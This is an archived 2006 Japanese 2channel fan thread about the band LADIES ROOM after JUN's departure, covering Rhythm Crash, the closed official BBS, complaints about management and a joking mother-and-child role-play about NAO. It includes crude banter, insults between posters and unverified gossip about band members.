5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

LADIES ROOM 5

1 :伝説の名無しさん:2006/04/24(月) 15:11:30
JUN………

2 :伝説の名無しさん:2006/04/24(月) 15:21:56
JUNスレ

3 :伝説の名無しさん:2006/04/24(月) 16:09:19
http://blog.livedoor.jp/camcamty/archives/23538300.html

4 :伝説の名無しさん:2006/04/24(月) 16:19:59
http://www6.cds.ne.jp/~itope/cgi/bbs_/apeboard_plus_.cgi

5 :伝説の名無しさん:2006/04/24(月) 16:25:49
GEORGE………Gスレ

6 :伝説の名無しさん:2006/04/24(月) 16:32:36
おかーーさーーーん

7 :伝説の名無しさん:2006/04/24(月) 16:42:45
SEX,SEX ROCK’N ROLL





















ろけんろー

8 :伝説の名無しさん:2006/04/24(月) 16:52:53
なおスレ

9 :伝説の名無しさん:2006/04/24(月) 17:10:51
◆◆◆◆◆◆◆◆百すれ太郎

10 :伝説の名無しさん:2006/04/24(月) 20:57:29
リズムクラッシュだな

11 :伝説の名無しさん:2006/04/25(火) 14:25:30
Jスレなんか腐ゴキブリネタばっか
Gスレは遊女共がギャースカわめくだけ
Hスレはツマンね―――――――
Nスレ?なんだソレ?誰も見ないっしょW意味ナシ

12 :伝説の名無しさん:2006/04/25(火) 14:57:01
ていうかもうココはLADIESスレじゃなくてリズクラスレだな

13 :伝説の名無しさん:2006/04/25(火) 17:44:15
だな

14 :伝説の名無しさん:2006/04/25(火) 17:54:19
後楽園ホール。

15 :伝説の名無しさん:2006/04/25(火) 18:08:33
↑これリズクラ一発目の場所だっけか?

16 :伝説の名無しさん:2006/04/25(火) 23:45:16
パワステが先だった?
忘れた…10年以上前のハナシだ品

17 :伝説の名無しさん:2006/04/26(水) 11:46:04
そうだな!パワステだったと思う。あん時はかなり違和感あったよな あんま記憶にネェけど

18 :伝説の名無しさん:2006/04/26(水) 14:51:45
リズクラが深夜番組に出てた時はビビった

19 :伝説の名無しさん:2006/04/26(水) 14:57:36
ミチュ ミチュ インザ レディズ ルーム〜♪
あ スレ違いだた KISSのスレにレッツラゴーw

20 :伝説の名無しさん:2006/04/26(水) 15:00:26
やっぱあの曲名をパクったのか

21 :伝説の名無しさん:2006/04/26(水) 16:55:08
そうに決まってるだろうが

22 :伝説の名無しさん:2006/04/26(水) 16:59:31
つか何今頃そんな事言ってんの?

23 :伝説の名無しさん:2006/04/26(水) 17:01:36
>>18
リズクラってテレビなんか出てたの?

24 :伝説の名無しさん:2006/04/26(水) 17:04:39
>>22
ばばあ信者だなw

25 :伝説の名無しさん:2006/04/26(水) 17:06:23
>>24
それは仕方ないレディースルーム自体も、じじいだからw

26 :伝説の名無しさん:2006/04/26(水) 17:08:34
>>24
信者っつー事はNAOの信者か?

27 :伝説の名無しさん:2006/04/26(水) 17:20:39
だろうね

28 :伝説の名無しさん:2006/04/26(水) 17:37:22
ヨシキがドラムで加入するってホントですか

29 :伝説の名無しさん:2006/04/26(水) 17:40:22
はい。さぁ。はい。

30 :伝説の名無しさん:2006/04/26(水) 17:42:03
ヨシキが「しゃべり」で参加するって聞いたよ?w

31 :伝説の名無しさん:2006/04/26(水) 17:43:35
とりあえず、このスレ排除しますね

32 :伝説の名無しさん:2006/04/26(水) 17:43:35
>>28
それをゆーならヨシキが参加して下さるって本当ですか
だろ?

33 :伝説の名無しさん:2006/04/26(水) 17:45:10
はぁ?何で?下さるって?wアフォか?wwなんだ?その言い方ww

34 :伝説の名無しさん:2006/04/26(水) 17:46:35
↑と敬語を知らぬDQNが申しておりますが何か?

35 :伝説の名無しさん:2006/04/26(水) 17:47:34
>>32
お前ヨシキの信者?死ねば?

36 :伝説の名無しさん:2006/04/26(水) 17:50:52
↑と更に世間知らずの社会の底辺のが申しておりますが何か?

37 :伝説の名無しさん:2006/04/26(水) 17:51:16
>>32
何でそんな言い方しなきゃいけないのかって言ってるんですよぉ?分かってますかああ??尊敬語を使う理由は?

38 :伝説の名無しさん:2006/04/26(水) 17:54:36
あ?馬鹿かお前は?
さんざん世話になったんだから当たり前だろ?
そんな事もわからんのか?頭わいてるな〜w


39 :伝説の名無しさん:2006/04/26(水) 17:56:42
はい何もなかった!何も見ない、何も話さない!


40 :伝説の名無しさん:2006/04/26(水) 17:57:13
あらw

41 :伝説の名無しさん:2006/04/26(水) 18:00:07
こいつらバッカだww

42 :伝説の名無しさん:2006/04/26(水) 18:01:23
>>41
あらw

43 :伝説の名無しさん:2006/04/26(水) 18:02:10
>>38
テメェはなんだ?お前が世話になった訳でもねぇのに知ったかすんなボケがw湧いてるにはお前のアタマw

44 :伝説の名無しさん:2006/04/26(水) 18:05:03
>>43
あら?まだやるの?
まあ〜そんなに必死になるなよw
イライラしたオバはんはみっともないからw

45 :伝説の名無しさん:2006/04/26(水) 18:09:02
イライラおばさんです。はい。

46 :伝説の名無しさん:2006/04/26(水) 18:11:21
とりあえず>>38の人。知ったかはやめようよ。みっともないよ?w

47 :伝説の名無しさん:2006/04/26(水) 18:11:39
>>43
wそろそろ飯のしたくしないとね〜
厚化粧のオバはんw年相応の格好しなさいよ
もう若くないんだから♪

48 :伝説の名無しさん:2006/04/26(水) 18:12:49
はいはいwお味噌汁でも作るとしますかュハァハァ

49 :伝説の名無しさん:2006/04/26(水) 18:19:55
ジョージって最近はもうあの縦型のベース使わないのね…あれカッコよくない?ベースがねw

50 :伝説の名無しさん:2006/04/26(水) 18:26:19
リズクラでは使ってたよね?

51 :伝説の名無しさん:2006/04/26(水) 18:48:55
熱き!レディースルーム (邦題)
あ!また スレ違いだた KISS板へ再びレッツラゴー

52 :伝説の名無しさん:2006/04/27(木) 03:42:40
レデースルーム

53 :伝説の名無しさん:2006/04/27(木) 09:05:11
リズムクラッシュ

54 :伝説の名無しさん:2006/04/27(木) 11:35:02
確かにここはリズムクラッシュスレだな、今のはレディースじゃねぇし

55 :伝説の名無しさん:2006/04/27(木) 15:27:43
>>32>>38オマエはジョージかよっw

56 :伝説の名無しさん:2006/04/27(木) 16:11:51
そうなんじゃん?

57 :伝説の名無しさん:2006/04/27(木) 16:26:50
だってヨシキに世話なったつーのはジョージと百だけじゃん。ローディーだったんだろ?w

58 :伝説の名無しさん:2006/04/27(木) 16:29:33
>>55
うっ バレたw
SEX GEORGE

59 :伝説の名無しさん:2006/04/27(木) 16:38:23
俺ジョージ。お前もジョージか?w

60 :伝説の名無しさん:2006/04/27(木) 16:43:31
リズクラ次ライヌいつ?

61 :伝説の名無しさん:2006/04/27(木) 17:05:12
>>59
ぬぁにぃ〜ヲマエもかぁ??

62 :伝説の名無しさん:2006/04/27(木) 17:48:03
漏れもジョージだけどw俺って人気者な。カッカッカw

63 :伝説の名無しさん:2006/04/27(木) 20:33:53
ヨシキに世話になったとかファンには関係ない話じゃん


64 :伝説の名無しさん:2006/04/27(木) 20:39:48
自分がエライと思う相手にはコメツキバッタ、そして女や後輩には陰湿なウサ晴らし!
それがジョージクォリティですから。

65 :伝説の名無しさん:2006/04/27(木) 20:52:38
えーっ!!ジョージって性格悪いの?

66 :すぇっくすじょ〜じ:2006/04/27(木) 23:59:04
テメ〜ラ!この帝王の俺様の事、さんざん好き勝手言ってくれるじゃねぇ〜かよ
コノウラミハラサデオクベキカw

67 :伝説の名無しさん:2006/04/27(木) 23:59:43
>>64
それが〇型の習性なのさ…

68 ::2006/04/28(金) 00:20:02
根拠のない血液分析オタはっけーん

69 :伝説の名無しさん:2006/04/28(金) 00:42:28
あ 当たってるかも(-o-;)ウチのおやじ

70 :伝説の名無しさん:2006/04/28(金) 12:53:52
ジョージはA型でしょ?

71 ::2006/04/28(金) 13:12:36
漏れはM型ハゲだ 文句あっか?

72 :伝説の名無しさん:2006/04/28(金) 13:30:07
陰毛も染めてたよね、この人。

73 :伝説の名無しさん:2006/04/28(金) 14:31:39
>>72
染めてねーよ
ブリーチで脱色してんだよ ワロ〜w

74 :伝説の名無しさん:2006/04/28(金) 14:58:17
チ〇毛も禿げればエロいのにw

75 :伝説の名無しさん:2006/04/28(金) 15:56:22
↑チ〇毛が禿げたら、オメエにぶち込んでやるぜ!

76 :伝説の名無しさん:2006/04/28(金) 18:40:05
チンゲ金髪ジョージ金髪。ナオ子供。百オヤジ。正確にいうとNAOはとっつぁん坊や。

77 :伝説の名無しさん:2006/04/28(金) 19:09:54
↑するどい!?リズムクラッシュ!!!!!!!ファイト!

78 :伝説の名無しさん:2006/04/28(金) 19:29:49
♪I Want To Be There〜

79 :伝説の名無しさん:2006/04/29(土) 21:00:13
>>75
一度ぶち込まれてるんでもう結構ですw

80 :伝説の名無しさん:2006/04/29(土) 21:02:18
冗談です。

81 :伝説の名無しさん :2006/04/30(日) 00:17:00
>>1 - >>80 自演乙、売り上げ枚数と比例してないカキコで、乙

82 :伝説の名無しさん:2006/04/30(日) 00:17:14
>>79 もしやオメエあの時の爆乳ハニーなのか?w

83 :伝説の名無しさん:2006/04/30(日) 12:31:05
リズクラLIVE決まったよ!!!

84 :伝説の名無しさん:2006/04/30(日) 13:22:28
いつ?

85 :伝説の名無しさん:2006/04/30(日) 14:19:09
いつか

86 :伝説の名無しさん:2006/04/30(日) 16:22:17
5日?

87 :伝説の名無しさん:2006/05/01(月) 12:09:06
今日はジョージのライヌ。漏れ行かねぇし、行ったヤシはレポよろ。

88 :伝説の名無しさん:2006/05/01(月) 12:46:26
行く訳ないじゃん

89 :伝説の名無しさん:2006/05/01(月) 13:05:23
だよな…全く興味なし。

90 :伝説の名無しさん:2006/05/01(月) 20:09:20
馬鹿桜満開LIVE中か?ほんとバカ

91 :伝説の名無しさん:2006/05/02(火) 00:03:30
今日楽しかったですよん。しかしティなんとかちゃん?あの外人のカワイイ子、一体何者?
Gの店でもよく見たんだが、、、
すごいカワイイんだが、、、Gファンなのかな?

92 :伝説の名無しさん:2006/05/02(火) 13:34:23
昨日のライブ思ってたよりお客さん入ってたし、盛り上ってたよ!
あくまで、思ってたより、だけどね。
外人の子、かわいかったかな・・・!?
楽屋から出てきたから関係者じゃないかな。

93 :伝説の名無しさん:2006/05/02(火) 14:05:16
またジョージの女遊びが始まったか…ww懲りないなぁw

94 :伝説の名無しさん:2006/05/03(水) 02:45:05
久しぶりにオフィに行ってみたんだけど
なんでBBS閉鎖されてんの?

95 :伝説の名無しさん:2006/05/04(木) 00:24:30
↑JUN脱退でBBS荒れに荒れたからさ〜
今まで長文の書き込みや日記的書き込み叩きがいたけどそれとは違う荒れ方で…
まるでココみたいだったしw

そんなんです。

96 :伝説の名無しさん:2006/05/04(木) 01:42:00
>>95
ごめん、も少し詳しく教えて。
メンバーを批判したの?
それとも脱退について何か書き込んだ人を批判したの?

97 :伝説の名無しさん:2006/05/04(木) 05:41:22
JUNさんがいないんならLADIESじゃない!とか、最後に4人の姿を見たかったとか。
それでDVD発売が決まったんだよ。

98 :伝説の名無しさん:2006/05/04(木) 13:48:39
じきにタートル自体、閉鎖するよ!

99 :伝説の名無しさん:2006/05/04(木) 14:08:37
海のものとも山のものとも言えないバンドがここまでこれたのは
JUNとNAOが加入したおかげっちゆーのは
紛れもない事実だしなー
言われるのも無理ないか

100 :伝説の名無しさん:2006/05/04(木) 16:04:49
百!!

101 :伝説の名無しさん:2006/05/04(木) 23:54:37
>>96タソ
多かった書き込みは
抜けるなら最後にもう一度LIVEが観たいって要望

JUNがいないなら私も一緒にLADIESを卒業します、みたいな宣言

JUNが抜けるならファソクラブのコーナーとか何だったのってゆー事務所スタッフサイドの批判

で、だんだん麺婆やスタッフの悪口まで書かれてたよ。
アホベースとか脳ナシスタッフとか

長文スマソ

102 :伝説の名無しさん:2006/05/05(金) 01:46:48
>>97
>>101
ありがと!
アホベース、脳なしスタッフw
閉鎖前に見たかった〜〜!
いつ復活するんだろ、BBS
全部消してしまうのか?

103 :伝説の名無しさん:2006/05/05(金) 01:54:15
JUN脱退ネタもういいじゃん?みんな前に向かって歩き出してるんだしさ。

104 :伝説の名無しさん:2006/05/05(金) 14:21:17
後退してるんだけどw

105 :伝説の名無しさん:2006/05/06(土) 02:06:57
塚、今更潤氏が脱退したことを議論してどうすんの?
他麺の批判してたら潤さん戻ってきてくれんの?書いてて空しくない?

106 :伝説の名無しさん:2006/05/06(土) 04:07:56
つか、LADIES終わってるし

107 :伝説の名無しさん:2006/05/06(土) 08:22:48
BBS閉鎖の理由教えてって聞かれたから答えただけで批判じゃなくない?

前に進むとか熱くなり杉だろwww


108 :伝説の名無しさん:2006/05/06(土) 09:24:01
ありゃ荒れるって、だってオフィがいい加減な事やってるからあぁいう事態になったんだと思うシ

109 :伝説の名無しさん:2006/05/07(日) 03:55:44
オフィにカキコする人っていい子ちゃんが多かった記憶あるけど、
メンやスタッフを批判するなんて意外だ

110 :伝説の名無しさん:2006/05/07(日) 03:57:26
匿名だしな

111 :伝説の名無しさん:2006/05/09(火) 00:58:08
百太郎好き。

112 :伝説の名無しさん:2006/05/09(火) 01:31:18
百ちゃんも批判されてた?

113 :伝説の名無しさん:2006/05/09(火) 13:39:16
オフィのBBSネタもう飽きた。

114 :伝説の名無しさん:2006/05/09(火) 21:25:22
百ってまだ女遊び激しいの?

115 :伝説の名無しさん:2006/05/10(水) 01:03:39
どうなんだろね?

116 :伝説の名無しさん:2006/05/10(水) 01:07:45
百は離婚してないんでしょ?夫婦仲はよいのか?

117 :伝説の名無しさん:2006/05/10(水) 02:03:13
ジョージはよく女関係で叩かれるけど百はそうでもないよね。遊び方がうまいんじゃないかな〜

118 :伝説の名無しさん:2006/05/10(水) 14:17:44
潤さん情報はないんだろうか。。。

119 :伝説の名無しさん:2006/05/10(水) 14:44:58
立ち上げ段階らしいよ。

120 :伝説の名無しさん:2006/05/10(水) 14:58:22
新バンド?!

121 :伝説の名無しさん:2006/05/10(水) 15:01:23
どうだろ…その辺よく分からないよ。

122 :伝説の名無しさん:2006/05/10(水) 15:51:26
電気屋やるとか?

123 :伝説の名無しさん:2006/05/10(水) 16:22:57
やるかぁーーーーーー。

124 :伝説の名無しさん:2006/05/10(水) 16:23:36
リズクラどうなってんの?

125 :伝説の名無しさん:2006/05/10(水) 17:01:44
ほんと!っていうかタートルあのまんまじゃん。なんなの?

126 :伝説の名無しさん:2006/05/10(水) 19:15:32
>>124
リズムクラッシュは生きてるの?活動してるの?

127 :伝説の名無しさん:2006/05/11(木) 07:27:41
>>117
ジョージって過去に女に裏切られてそうw

128 :伝説の名無しさん:2006/05/11(木) 14:13:25
りずくらふぉーーーーーーーーーーーーーーーーーーーーーーーーーーーっ!

129 :伝説の名無しさん:2006/05/11(木) 17:44:54
ネタが無いなぁ

130 :伝説の名無しさん:2006/05/11(木) 17:49:30
ナオのブログは訳分からなくて楽しいよ?意味不明ーだけろ

131 :伝説の名無しさん:2006/05/11(木) 18:30:15
とうとうイっちゃったか?

132 :伝説の名無しさん:2006/05/11(木) 18:39:11
少数の信者も居るみたいだしイイんじゃん?w

133 :伝説の名無しさん:2006/05/12(金) 18:45:42
宗教団体「NAO真理教」

134 :伝説の名無しさん:2006/05/12(金) 22:24:44
??全然宗教っぽくなくない?

135 :伝説の名無しさん:2006/05/12(金) 23:02:51
亀屋入ってないから分からない…
亀屋、価値ある訳?

136 :伝説の名無しさん:2006/05/12(金) 23:14:32
梨。

137 :伝説の名無しさん:2006/05/12(金) 23:26:05
>>134
あなた自身が宗教だから分からないのでは?w


138 :伝説の名無しさん:2006/05/13(土) 00:51:27
JUN脱退したの?
ショック(T-T) グスッ

139 :伝説の名無しさん:2006/05/13(土) 01:29:46
遅っ↑

140 :伝説の名無しさん:2006/05/13(土) 18:08:56
昨日初めて'CLOCK STRIKES TENのPV見た。
面白かった。

JUNかっこいいなー!

141 :伝説の名無しさん:2006/05/13(土) 18:29:19
遅っ↑

142 :伝説の名無しさん:2006/05/14(日) 23:28:10
naoは元気ですか?

143 :伝説の名無しさん:2006/05/15(月) 02:56:35
元気っぽいよ。

144 :伝説の名無しさん:2006/05/15(月) 08:38:35
きっかりに君をむかえにゆくよ(^_^)

145 :伝説の名無しさん:2006/05/15(月) 08:55:57
初めて公式見た
nao スガシカオみたいじゃないかwwwwwwwww
厚塗りやめたんだね

146 :伝説の名無しさん:2006/05/16(火) 08:57:48
NAOは癒し系

147 :伝説の名無しさん:2006/05/16(火) 10:10:20
NAOみたいなパパがほしい

148 :伝説の名無しさん:2006/05/16(火) 12:05:34
あ、わたしもほしーw

149 :伝説の名無しさん:2006/05/16(火) 12:28:42
ジョージがパパだと、女癖悪く酒浸り 

NAOがパパなら、家族みんなほのぼのしてて
子供達の前でも平気でママと
ちゅ〜
しちゃいそうな感じ

お休みの日は、ママ手作りのお弁当持参で公園へピクニック
NAOファミリーは家庭崩壊なんてありえなそう

勝手な妄想 失礼しますたwww

150 :伝説の名無しさん:2006/05/16(火) 12:31:34
けど…NAOと一緒に居てもつまらなそ

151 :伝説の名無しさん:2006/05/16(火) 12:34:33
んー 妙な沈黙が流れそうだねw
寝そう

152 :伝説の名無しさん:2006/05/16(火) 12:55:23
老後は、婆さんと縁側で茶を啜り日向ぼっこ

153 :伝説の名無しさん:2006/05/16(火) 13:34:09
それ、ありえるーー(>_<;)つまらん人生じゃったのぉー…って

154 :伝説の名無しさん:2006/05/16(火) 13:41:02
なんだこの流れ
N信者が此処にも来ちゃった?

155 :伝説の名無しさん:2006/05/16(火) 13:42:56
それはそれでイイじゃん!すごい楽しそうだよ

156 :伝説の名無しさん:2006/05/16(火) 13:45:38
N教か?w

157 :伝説の名無しさん:2006/05/16(火) 13:46:48
>>154
急にNAOが懐かしくなって書いてみた
邪魔してスマン

158 :伝説の名無しさん:2006/05/16(火) 13:59:08
いいんじゃねぇの?たまにはNAOのスレも

159 :伝説の名無しさん:2006/05/16(火) 14:00:36
naoさん…存在を知らせてあげた方がいいかもw

160 :伝説の名無しさん:2006/05/16(火) 14:52:39
NIGHT TO NIGHTのイントロで飛び跳ねるNAOさんに萌え

161 :伝説の名無しさん:2006/05/16(火) 16:03:56
MC中、百の突っ込みに笑顔でかわすNAO萌え〜

162 :伝説の名無しさん:2006/05/16(火) 16:26:40
ジョージの下ネタトークに

萌えない罠w

163 :伝説の名無しさん:2006/05/16(火) 16:36:45
解 散 決 定

164 :伝説の名無しさん:2006/05/16(火) 16:43:22
言っちゃった…w

165 :伝説の名無しさん:2006/05/16(火) 17:28:39
そんなのイヤだ!!

166 :伝説の名無しさん:2006/05/16(火) 17:52:28
仕方ないよね!!今の状況じゃ。。。


167 :伝説の名無しさん:2006/05/16(火) 17:57:19
事務所が悪いんじゃない?だって前の対応みたら分かるよ。いい加減だもん

168 :伝説の名無しさん:2006/05/16(火) 19:36:54
ふむふむ

169 :伝説の名無しさん:2006/05/16(火) 19:38:08
確蟹。いい加減杉。見てみなよ!オフィ。

170 :伝説の名無しさん:2006/05/16(火) 19:51:45
だから重箱の隅つつくのやめろよ暇人が!!
オフィチェック以外にやることないの?

171 :伝説の名無しさん:2006/05/16(火) 19:53:48
ない。

172 :伝説の名無しさん:2006/05/16(火) 19:58:28
>>170
大事な事だよ?事務所の失態が麺の責任とかと思われちゃうんだぜ?オヒの責任で大混乱になったのがイイ例だよ。とにかく対応悪杉。

173 :伝説の名無しさん:2006/05/16(火) 20:03:25
みんなレディースが大好きだから、早く活動してくれないかと待ってるんだよ。

174 :伝説の名無しさん:2006/05/16(火) 22:33:48
更新あったじゃん〜
でも微妙に前のが残ってる。。。教えてあげたいんだがその程度でメールすんのもねぇ。
すたふさん、自ら気づいてくれぇぇ

175 :伝説の名無しさん:2006/05/17(水) 10:39:05
JUNさん元気かな

176 :伝説の名無しさん:2006/05/17(水) 11:25:20
元気な事を願う!

またGEORGEファソクラブで夜露死苦とか言ってるけど…

177 :伝説の名無しさん:2006/05/17(水) 12:16:02
ここのスタなんて良いほうじゃん!メールすれば直ぐに丁寧な答えが返ってくるし、対応も早い方だと思う。チケ送られてくれば、会場場所の地図も入ってるし、親切杉。ただ掲示板の件は、ポカーンだったが

178 :伝説の名無しさん:2006/05/17(水) 14:17:01
は?全くだよ?対応とか超遅いけど?それ、最近の話だろ?

179 :伝説の名無しさん:2006/05/17(水) 18:17:22
あぁ、あのバカ事務所ね

180 :伝説の名無しさん:2006/05/17(水) 19:16:10
>>176
あのベースの人「タダで見れるからよ」って
ファンクラブのパスワード色んな人に教えてるけど
また?

181 :伝説の名無しさん:2006/05/17(水) 20:01:14
>>177
洩れは2時間ぐらいでメールの返事もらったよ。割と最近。
メンバー間のごたごたに巻き込まれて事務所スタこそかわいそう。
>>180
教えることでGに何の得になるの?Gは自分の得にならないことはやらない人。
ただで教えるより6000円貰った方が得に決まってんじゃんw
というわけで、ネタですな。

182 : 伝説の名無しさん:2006/05/17(水) 20:55:42
レディースファンとセクロスしたい漏れが来ましたよ

183 :伝説の名無しさん:2006/05/17(水) 21:22:35
>>182
ハメ撮りマダァ-? (・∀・ )っ/凵⌒☆チンチン

184 :伝説の名無しさん:2006/05/17(水) 23:07:07
>>181あれw私もパス教えてもらったけどw
頼んでないのにグッズもくれるし

185 :伝説の名無しさん:2006/05/17(水) 23:13:34
>>182
腐女しかいないけどいいですか?

186 :伝説の名無しさん:2006/05/17(水) 23:21:12
>>185
腐女が好きですから

187 :伝説の名無しさん:2006/05/17(水) 23:25:12
Gも、あれだな・・・・

188 :伝説の名無しさん:2006/05/18(木) 00:23:50
>>184
でもレディースファンでもなんでもない椰子が亀家サイト見てもつまんなくねぇ?
ファンならたかが6000円ごときさっさと出すだろうし、、、
結論:ネタだねw

189 :伝説の名無しさん:2006/05/18(木) 14:08:25
ジョージ最悪

190 :伝説の名無しさん:2006/05/18(木) 16:21:02
やってる事が?↑

191 :伝説の名無しさん:2006/05/18(木) 16:32:34
最悪って言いたいだけなんじゃない?

192 :伝説の名無しさん:2006/05/18(木) 17:44:19
191はどう思ってんの?

193 :伝説の名無しさん:2006/05/18(木) 18:54:26
まあいいじゃん。リズムクラッシュ応援しようよ

194 :伝説の名無しさん:2006/05/18(木) 20:00:22
するか!!ヴォケw

195 :伝説の名無しさん:2006/05/18(木) 22:14:35
ぷぷぷっ

196 :伝説の名無しさん:2006/05/19(金) 00:03:19
リズムクラッシュって言ってる時点でさぶい。

197 :伝説の名無しさん:2006/05/20(土) 12:34:04
リズムクラッシュの三人がさぶい。

198 :伝説の名無しさん:2006/05/20(土) 14:26:22
百太郎好き。

199 :伝説の名無しさん:2006/05/20(土) 14:54:51
NAOと草津へ温泉の旅に行きたい
「あ〜極楽 極楽」

200 :伝説の名無しさん:2006/05/20(土) 15:55:07
そうかい。

201 :伝説の名無しさん:2006/05/20(土) 16:24:27
爽快。

202 :伝説の名無しさん:2006/05/20(土) 16:25:18
みんなでNAOと旅行に行こうー

203 :伝説の名無しさん:2006/05/20(土) 17:40:50
NAOと全国温泉巡りツアー開催

204 :伝説の名無しさん:2006/05/20(土) 18:18:07
秋にはNAOと紅葉&温泉ツアー

205 :伝説の名無しさん:2006/05/20(土) 18:32:42
冬には、NAOとかまくら作り&温泉ツアー

206 :伝説の名無しさん:2006/05/20(土) 19:00:36
夏はやっぱNAOと海かな!またハワイがいいな♪

207 :伝説の名無しさん:2006/05/20(土) 20:06:25
海・・・春はNAOと潮干狩り
アサリ掘るど〜

208 :伝説の名無しさん:2006/05/20(土) 20:57:47
NAOだけだよね?GEORGEは三段腹だから見たくないよ。GEORGE欠席。

209 :伝説の名無しさん:2006/05/20(土) 21:07:50
GEORGEイラネ

210 :伝説の名無しさん:2006/05/20(土) 23:10:23
ジョージスレッドストッパー

211 :伝説の名無しさん:2006/05/21(日) 09:06:20
今年のMARRYさんの追悼ライブLADIESは出演?

212 :伝説の名無しさん:2006/05/21(日) 10:06:53
それLOFTでやんの?

213 :伝説の名無しさん:2006/05/21(日) 11:50:36
大阪、新宿HOLIDAYにて同時開催ですって。

214 :伝説の名無しさん:2006/05/21(日) 12:20:53
THANKS!けど行かないかなぁー…(>_<;)

215 :伝説の名無しさん:2006/05/21(日) 12:21:40
あ、私が行かないって事ね

216 :伝説の名無しさん:2006/05/21(日) 13:12:36
ロフトなんかでやるんだー?

217 :伝説の名無しさん:2006/05/21(日) 16:03:40
メンバーでタトゥーいれてるのって誰?

218 :伝説の名無しさん:2006/05/21(日) 16:42:05
GEORGEのみ

219 :伝説の名無しさん:2006/05/21(日) 18:53:21
NAO〜
ご飯だよ〜

220 :伝説の名無しさん:2006/05/21(日) 19:02:07
いただきまぁーす

221 :伝説の名無しさん:2006/05/21(日) 19:06:36
NAO
よく噛んで食べなさい!

222 :伝説の名無しさん:2006/05/21(日) 19:08:51
おいちーよー。モグモグゴックン

223 :伝説の名無しさん:2006/05/21(日) 19:51:28
追悼ライブ出るのってGだけ?

224 :伝説の名無しさん:2006/05/21(日) 20:27:42
NAO〜
ご飯食べ終わったら食器を台所へ持って行きなさ〜い

225 :伝説の名無しさん:2006/05/21(日) 20:36:50
ゴシゴシキュッキュ…おーい、おかわり〜

226 :伝説の名無しさん:2006/05/21(日) 20:40:32
濯いだ瞬間キュキュっと落ちて♪
NAOのおかわりは母ちゃんが食べちまったよ

227 :伝説の名無しさん:2006/05/21(日) 20:54:48
なんだよおぉぉぉぉ…(涙)

228 :伝説の名無しさん:2006/05/21(日) 21:04:27
いつも少食で残すでしょ!
母ちゃん あんたの体が心配なんだよ
母ちゃんの贅肉いるか?

229 :伝説の名無しさん:2006/05/21(日) 21:13:57
そんなのいらないよぉ、だってマズそうだもぉん

230 :伝説の名無しさん:2006/05/21(日) 23:26:51
ねぇねぇ、お風呂に入りたいよぉー

231 :伝説の名無しさん:2006/05/21(日) 23:28:25
母ちゃ〜ん…お風呂入りたいから一緒に入ってよー

232 :伝説の名無しさん:2006/05/21(日) 23:56:14
子供みたいなこと言ってないで
早く孫の顔見せておくれよ
あんたの孫の顔見るまで
母ちゃん死ねないよ!

233 :伝説の名無しさん:2006/05/22(月) 00:44:28
分かったよー、母ちゃん…母ちゃんが好きだ!大好きだ!

234 :伝説の名無しさん:2006/05/22(月) 04:31:27
お母ちゃんおはよお。僕ね、おねしょしちゃった

235 :伝説の名無しさん:2006/05/22(月) 07:03:11
またおねしょかい
今日の晩飯は抜きだよ!
ギターも1日没収
反省しなさい!

236 :伝説の名無しさん:2006/05/22(月) 07:19:11
>>219から全然おもんない。自己満。おもろいと思って書いてる君。おもんないから。

237 :伝説の名無しさん:2006/05/22(月) 07:24:08
スレの伸び悪いんだし別によくね?

238 :伝説の名無しさん:2006/05/22(月) 07:57:22
ええぇぇ、、母さん、僕ギター弾きたいよお。。。グスン…

239 :伝説の名無しさん:2006/05/22(月) 08:09:11
>>236 癒し系NAOに嫉妬

240 :伝説の名無しさん:2006/05/22(月) 08:20:36
>>236
言葉が変。何人だろw

241 :伝説の名無しさん:2006/05/22(月) 08:25:10
おもん
プゲラ

242 :伝説の名無しさん:2006/05/22(月) 08:26:53
>>236の人気に嫉妬

243 :伝説の名無しさん:2006/05/22(月) 10:00:45
>>236
母さーん、この人の言葉の意味が分からないよー。言葉使いが変だよー?僕、もっと勉強した方がいいのかなー…

244 :伝説の名無しさん:2006/05/22(月) 10:11:12
あんた勉強する気あるのかい?
毎日ギターばかり弄ってたら母ちゃん怒るよ!

NAO〜
ジョージから電話だよ〜
早く出なさい


245 :伝説の名無しさん:2006/05/22(月) 10:14:00
え〜〜xxジョージー?あいついい加減な事ばっか言ってるから出たくないよー、、ねぇねぇ母さん居留守使ってくれなーい?w

246 :伝説の名無しさん:2006/05/22(月) 10:23:21
まったくいつまでも子供みたいなこと言わないでおくれよ!

ほらっ
ジョージから伝言だよ
「NAO Fuck!」
ガチャン

247 :伝説の名無しさん:2006/05/22(月) 10:35:19
母ちゃん 銀座まで買い物行くから
留守番頼んだよ!

248 :伝説の名無しさん:2006/05/22(月) 11:17:10
イヤだあ!母ちゃん僕も一緒に行く

249 :伝説の名無しさん:2006/05/22(月) 16:45:23
母ちゃんメール

NAOへ
夕飯の支度で17:00迄に帰ろうと思ったけど
お友達とね〜歌舞伎話が盛り上がって
喫茶店でコーヒー飲んでるところだよ
夕飯は冷蔵庫に入ってるもので適当に済ませておくれよ


250 :伝説の名無しさん:2006/05/22(月) 18:11:26
母ちゃん…そんなもん飲んでないで早く帰ってきてくれよー。ギター隠しただろー…何処にやったの?

251 :伝説の名無しさん:2006/05/22(月) 21:04:57
ただいま〜
NAO〜
居るのか〜い?

252 :伝説の名無しさん:2006/05/22(月) 23:06:28
NAOと添い寝したい

253 :伝説の名無しさん:2006/05/22(月) 23:07:17
DVDのタイトル熱過ぎ!!

254 :伝説の名無しさん:2006/05/22(月) 23:23:59
ネイキッドハートって曲、かなり良いけど、何で当時シングル化されなかったの?
シングル化出来ない程の何かの元ネタ(パクリ)があったの?

255 :伝説の名無しさん:2006/05/22(月) 23:29:41
今更 DVD予約は受け付けないよね・・・はぁ〜見たいな〜

256 :伝説の名無しさん:2006/05/23(火) 00:35:52
オレは予約したから観れる!

257 :伝説の名無しさん:2006/05/23(火) 00:47:59
>>255
すぐ売りに出るさ〜

258 :伝説の名無しさん:2006/05/23(火) 01:26:37
↑ありえん

259 :伝説の名無しさん:2006/05/23(火) 03:56:06
↑確かに。再結成してからのビデオとDVD探してるけど、全然見つからないよ。

260 :伝説の名無しさん:2006/05/23(火) 08:42:33
買う人が少ないかなら〜。

261 :伝説の名無しさん:2006/05/23(火) 08:51:25
なにっ?

262 :伝説の名無しさん:2006/05/23(火) 12:44:27
母ちゃん散歩に行ってたよー、だって凄く暇なんだもん

263 :伝説の名無しさん:2006/05/23(火) 13:10:19
  ★★★★★CD・DVD情報★★★★★
「仮面ライダーカブト」
エンディングテーマ
RIDER CHIPS
『FULL FORCE』
定価1,260円(税込)[エイベックス]
